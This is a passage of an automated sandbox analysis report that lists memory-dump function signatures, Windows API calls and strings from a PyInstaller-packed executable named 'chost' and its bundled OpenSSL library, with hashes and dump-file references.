                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                        • Instruction ID: 6c635943339b1005d1e5bfd80b3d1df99dec213bf81c3ee0982361b847a8193f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A126F33E0C183C6FF749A26E0946B966A1EB40754F988179E6D9C6BC4DF7CE884DB10
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
                                                                                                                                                                                                                                        • Instruction ID: ec5b29f3ee001a00052139818e83dbfb05d0e20ceda91b008959f46fcfd6e79a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2415E21A0865382EA30DB33A8866B9B394FF45BC4F4484B9ED5DC7796DE3CE505CB40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF694363CBB), ref: 00007FF6943688F4
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF694363CBB), ref: 00007FF6943688FA
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00007FF694363CBB), ref: 00007FF69436893C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368A20: GetEnvironmentVariableW.KERNEL32(00007FF69436388E), ref: 00007FF694368A57
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF694368A79
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6943782A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943782C1
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                        • Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                        • Instruction ID: aef251a8b39d2586d2fea0c913fb3acc5570be9425b6667555f62ba95da060a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54417121B1D64381EA38AB37A8D62B96291EF89B84F40C179ED4DC7796DE3CE504C301
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                                        • API String ID: 4069847057-331183818
                                                                                                                                                                                                                                        • Opcode ID: 264d796601ee4600ab856f7a5447ec93f073d7ad70ce69a7da71c276a595527a
                                                                                                                                                                                                                                        • Instruction ID: 3614e2152f5987448af52d22f4e44a38e7d9a781a61ff72fb79ed8fca057cac9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 264d796601ee4600ab856f7a5447ec93f073d7ad70ce69a7da71c276a595527a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08D1D472B0C68246E761CA199460B3976E8FB44790F144135E9AE67EDDEE3CEC41CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                        • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                        • Instruction ID: c486dad9c05d8cdaf301deaaaed40cbe5c3140edf7d59c87d9ecfd8de4fe6594
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2D180729087428AEB309B76D4833AD37A4FB45798F108179EE8D97B9ADF38E455C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E20033420ErrorLast
                                                                                                                                                                                                                                        • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                                        • API String ID: 1442048445-502574948
                                                                                                                                                                                                                                        • Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                        • Instruction ID: 85edb462833f857bb380a45945fe671311484a7be200eef65fea82adef2c2ea3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB916C61B1C68242FB55FB21A471BBA7299EF85784F440135EA6E07FDEEF3CE8018604
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF69437F11A,?,?,0000016E153E74D8,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EEFC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF69437F11A,?,?,0000016E153E74D8,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EF08
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                        • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                        • Instruction ID: 8d67b55a8ae088118a163dd5005bf77d52e70ad4ae254cfddca917fc283f9476
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D241CC72B1DA12C1FA25CB27988567522A1FF48B90F98897DED5EC7B94EE3CE404C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF694362D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                        • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction ID: 649b692ec7860ba4d2938e5c25e096bf65b030219bf8595977c55acd525289bf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A331C962708A4252E630AB37A8952AA76A5FF84794F418139EF4DD3799DF3CD506C700
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                        • API String ID: 0-1087561517
                                                                                                                                                                                                                                        • Opcode ID: b7739ce2ce003fb2b052b6516dd7c285a11f3665f8b81cd71f1fe9b479121a1c
                                                                                                                                                                                                                                        • Instruction ID: a05ff9e6f64c231bdabbaca22db133e4b2d2082f32a32da7af551ffcce14d3b8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7739ce2ce003fb2b052b6516dd7c285a11f3665f8b81cd71f1fe9b479121a1c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30D16B61B0864350FB14AA629961BFA72ADEF81788F984031DD3E47EDFDE3DE5028710
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                        • API String ID: 0-2528746747
                                                                                                                                                                                                                                        • Opcode ID: b7f3cfd17a60fa33393e94fedb923a5697f560e55c10e3887d0c589b80078274
                                                                                                                                                                                                                                        • Instruction ID: 28b9a73a002132cd13809011cf401f8bca3594f15259fce262c1eef37c6c3711
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7f3cfd17a60fa33393e94fedb923a5697f560e55c10e3887d0c589b80078274
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB17F61B08A8285FB14AB62D861ABDB769BF81784F404132DE3D47EDEDF3DE6058350
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDBD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDCB
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDF5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE63
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE6F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                        • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction ID: 4e51e24897ab5e689e34f907e73ef028a1fa941d7c3d74bd6b039c1a6f81117a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4131CD21B2A64391EE32DB23A8825B57394FF58BA0F598579ED1D8B394EF3CE444C314
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF69436351A,?,00000000,00007FF694363F23), ref: 00007FF694362AA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                        • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction ID: 6df2a56c3738d86e5d6a339276a50b68680bbf87c9199da9b85550d10549a381
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15217172A1978292E6309B62B8817EA73A4FB88784F40417AFE8CC3759DF7CD545C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                        • Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                        • Instruction ID: 9af662ae11957c42ee49bd39f2cb39d3d3b47e81e672457a31fff84a219f86f5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
